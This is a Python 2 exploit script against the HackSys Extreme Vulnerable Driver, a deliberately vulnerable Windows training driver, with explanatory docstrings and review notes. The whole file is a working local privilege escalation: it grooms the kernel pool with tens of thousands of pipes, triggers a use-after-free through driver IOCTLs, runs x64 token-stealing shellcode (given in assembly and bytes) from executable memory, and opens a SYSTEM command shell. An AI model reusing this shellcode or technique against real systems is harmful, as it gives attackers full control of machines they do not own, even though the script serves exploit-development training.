# -*- coding: utf-8 -*-
import sys
from ctypes import *
from ctypes.wintypes import *
import struct
import time
import os
kernel32 = windll.kernel32
ntdll = windll.ntdll  # loaded here but not referenced anywhere else in this file
ALLOC_SIZE = 0x70 # Adjust this value to get chunk allocations of desired length
BUFSIZE = (ALLOC_SIZE - 0x48) # Calculating buffer size to allocate chunks of given length
# NOTE(review): 0x48 is presumably the fixed per-pipe-buffer overhead the author
# measured so that a BUFSIZE write lands in an ALLOC_SIZE chunk -- TODO confirm.
# Module-level lists that hold every pipe handle created by spray(); they exist
# only so the ctypes HANDLE objects are never garbage-collected while the script runs.
handle_read_array1 = []
handle_write_array1 = []
handle_read_array2 = []
handle_write_array2 = []
# Inputs to ctl_code(); these mirror the Windows CTL_CODE macro constants.
METHOD_NEITHER = 0x3
FILE_ANY_ACCESS = 0x0
FILE_DEVICE_UNKNOWN = 0x00000022
def ctl_code(function,
             devicetype = FILE_DEVICE_UNKNOWN,
             access = FILE_ANY_ACCESS,
             method = METHOD_NEITHER):
    """Build a Windows IOCTL control code the way the CTL_CODE macro does.

    Field layout of the 32-bit result: device type in bits 16-31, access
    in bits 14-15, function number in bits 2-13 and transfer method in
    bits 0-1. Defaults correspond to a driver that uses FILE_DEVICE_UNKNOWN,
    FILE_ANY_ACCESS and METHOD_NEITHER.

    Args:
        function: Driver-specific function number.
        devicetype: Device type field.
        access: Required access field.
        method: Buffering method field.

    Returns:
        The assembled control code as an int.
    """
    device_field = devicetype << 16
    access_field = access << 14
    function_field = function << 2
    return device_field | access_field | function_field | method
def get_device_handle(device):
    """Open a read/write handle to a named device object with CreateFileA.

    Args:
        device: Device path string as passed by the caller.

    Returns:
        The raw value CreateFileA returned (ctypes default int restype).

    Exits the process with status -1 when that value is falsy.
    """
    open_existing = 0x3           # OPEN_EXISTING
    generic_read = 0x80000000     # GENERIC_READ
    generic_write = 0x40000000    # GENERIC_WRITE
    handle = kernel32.CreateFileA(device,
                                  generic_read | generic_write,
                                  None,          # dwShareMode
                                  None,          # lpSecurityAttributes
                                  open_existing,
                                  0x40000080,    # FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL
                                  None)          # hTemplateFile
    # NOTE(review): CreateFileA signals failure with INVALID_HANDLE_VALUE (-1),
    # which is truthy, so this branch only fires for a literal 0/None result.
    if not handle:
        print("\t[-] Unable to get device handle")
        sys.exit(-1)
    return handle
def spray():
    """Create many anonymous pipes, fill each, then drain every second one of a smaller batch.

    Two batches are created with CreatePipe (50,000 then 5,000), each pipe is
    written with BUFSIZE bytes of 0x41, and every other read end of the second
    batch is drained with ReadFile. All handles are appended to the module-level
    handle_*_array lists. Any API failure prints a message and exits the
    process (-1 for CreatePipe, -2 for WriteFile/ReadFile).

    Depends on the module-level ctypes object ``resultLength``, which is only
    created under ``if __name__ == "__main__"``; calling spray() from an import
    would raise NameError on the first WriteFile.
    """
    # Massaging the Pool
    print("[+] Starting to Spray Pool Memory (Filling Holes)")
    # Allocating all needed pipes
    for i in range(0, 50000):
        readPipe = HANDLE()
        writePipe = HANDLE()
        # Create Pipe for content in Non-paged Pool
        if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE):
            print("[!] Failed to Create Pipe... exiting now")
            sys.exit(-1)
        # Keep the handles to prevent Garbage Collection
        handle_read_array1.append(readPipe)
        handle_write_array1.append(writePipe)
    print("Writing buffer now!")
    for handle in handle_write_array1:
        # Write to the allocated
        # (the same BUFSIZE buffer of 0x41 is rebuilt on every iteration)
        pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE)
        if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None):
            print("[!] Failed to write to pipe... exiting now")
            sys.exit(-2)
    print("\t[*] Finished Filling Holes with {0} Objects".format(len(handle_write_array1)))
    print("[+] Spraying 5k more for holes")
    for i in range(0, 5000):
        readPipe = HANDLE()
        writePipe = HANDLE()
        # Create Pipe for content in Non-paged Pool
        if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE):
            print("[!] Failed to Create Pipe... exiting now")
            sys.exit(-1)
        # Keep the handles to prevent Garbage Collection
        handle_read_array2.append(readPipe)
        handle_write_array2.append(writePipe)
    for handle in handle_write_array2:
        # Write to the allocated
        pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE)
        if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None):
            print("[!] Failed to write to pipe... exiting now")
            sys.exit(-2)
    print("[+] Grooming the spray!")
    # Drain every other pipe of the second batch ([::2] -> indices 0, 2, 4, ...)
    for handle in handle_read_array2[::2]:
        buff = create_string_buffer(BUFSIZE+1)
        if not kernel32.ReadFile(handle, buff, BUFSIZE, byref(resultLength), None):
            # NOTE(review): message says "write" but this is a ReadFile failure
            print("[!] Failed to write to pipe... exiting now")
            sys.exit(-2)
    print("\t[*] Done Grooming!")
    return
def virtual_alloc_payload():
    """Copy the payload bytes from the Python heap into a freshly allocated region.

    Calls heap_alloc_payload() for the source address/length, then VirtualAlloc
    with size 1024, flags 0x3000 (MEM_COMMIT | MEM_RESERVE) and protection 0x40
    (PAGE_EXECUTE_READWRITE), and memmove()s the bytes across.

    Returns:
        The value VirtualAlloc returned (ctypes default int restype).
    """
    payload_length, payload_address = heap_alloc_payload()
    va_address = kernel32.VirtualAlloc(None, 1024, c_int(0x3000), c_int(0x40))
    print("[+] VirtualAlloc address: 0x%X" % va_address)
    print("[+] Copying payload to VirtualAlloc region")
    memmove(va_address, payload_address, payload_length)
    return va_address
def heap_alloc_payload():
    """Build the payload byte string and return its length and in-memory address.

    The assembly listing below documents the bytes assembled further down.

    token_stealing_shellcode = (
    start:
        mov rdx, [gs:188h]      ;KTHREAD pointer
        mov r8, [rdx+70h]       ;EPROCESS pointer
        mov r9, [r8+188h]       ;ActiveProcessLinks list head
        mov rcx, [r9]           ;follow link to first process in list
    find_system:
        mov rdx, [rcx-8]        ;ActiveProcessLinks - 8 = UniqueProcessId
        cmp rdx, 4              ;UniqueProcessId == 4?
        jz found_system         ;YES - move on
        mov rcx, [rcx]          ;NO - load next entry in list
        jmp find_system         ;loop
    found_system:
        mov rax, [rcx+80h]      ;offset to token
        and al, 0f0h            ;clear low 4 bits of _EX_FAST_REF structure
    find_cmd:
        mov rdx, [rcx-8]        ;ActiveProcessLinks - 8 = UniqueProcessId
        cmp rdx, 1234h          ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
        jz found_cmd            ;YES - move on
        mov rcx, [rcx]          ;NO - next entry in list
        jmp find_cmd            ;loop
    found_cmd:
        mov [rcx+80h], rax      ;copy SYSTEM token over top of this process's token
    return:
        ret
    )

    Returns:
        (payload_length, payload_address): byte count of the string and the
        address used as the memmove() source by virtual_alloc_payload().
    """
    # Byte form of the listing above. struct.pack("<L", os.getpid()) splices the
    # current PID in place of the 1234h placeholder. Python 2 str concatenation:
    # struct.pack returns str, and the last two literals are joined at compile time.
    token_stealing_shellcode = (
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88"
        "\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74"
        "\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48"
        "\x8B\x51\xF8\x48\x81\xFA" + struct.pack("<L", os.getpid()) + "\x74\x05\x48\x8B\x09\xEB"
        "\xEE\x48\x89\x81\x80\x00\x00\x00\xC3"
    )
    payload_length = len(token_stealing_shellcode)
    # id() is the object address under CPython; +32 presumably skips the str
    # object header to reach the character data -- interpreter/build specific.
    payload_address = id(token_stealing_shellcode) + 32
    print("[+] Payload address: 0x%X" % payload_address)
    return payload_length, payload_address
if __name__ == "__main__":
    # ctypes out-parameters for DeviceIoControl/WriteFile/ReadFile.
    # resultLength is read by spray() as a module global, so it must exist before spray() runs.
    bytes_returned = c_ulong()
    resultLength = c_ulong()
    # Control codes for the four driver handlers used below (see ctl_code)
    ioctl_Allocate_UAF_Object = ctl_code(0x804)
    ioctl_Free_UAF_Object = ctl_code(0x806)
    ioctl_Allocate_Fake_Object = ctl_code(0x807)
    ioctl_Use_UAF_Object = ctl_code(0x805)
    device_name = "\\\\.\\HackSysExtremeVulnerableDriver"
    device_handle = get_device_handle(device_name)
    # Python 2 print statement; the file mixes this with print(...) calls
    print "[+] Constructing fake object"
    shellcode_ptr = virtual_alloc_payload()
    # Fake object: 8-byte little-endian pointer to the payload, then 0x58 filler
    # bytes and a terminating NUL -- 0x61 bytes in total
    evil_input = struct.pack("<Q", shellcode_ptr) + "B" * 0x58 + "\x00"
    evil_size = len(evil_input)
    einput = create_string_buffer(evil_input, evil_size)
    spray()
    print("[+] Allocating UAF Object!")
    # Allocating HackSys UAF Object
    # NOTE(review): none of the DeviceIoControl return values below are checked
    kernel32.DeviceIoControl(device_handle, ioctl_Allocate_UAF_Object, None, 0, None, 0, byref(bytes_returned), None)
    print("[+] Freeing UAF Object!")
    # Freeing the UAF Object
    kernel32.DeviceIoControl(device_handle, ioctl_Free_UAF_Object, None, 0, None, 0, byref(bytes_returned), None)
    print("[+] Spraying Fake Object!")
    # Same einput buffer is submitted 2,500 times
    for i in range(0, 2500):
        kernel32.DeviceIoControl(device_handle, ioctl_Allocate_Fake_Object, addressof(einput), evil_size, None, 0,byref(bytes_returned), None)
    print "[+] Triggering UAF .."
    kernel32.DeviceIoControl(device_handle, ioctl_Use_UAF_Object, None, 0, None, 0,byref(bytes_returned), None)
    print "[+] Testing for High privileges!"
    # Case-sensitive substring match on the whoami output
    if 'system' in os.popen('whoami').read():
        print "\t[*] Happy Times ;-) have fun with the system shell..."
        os.system("cmd.exe")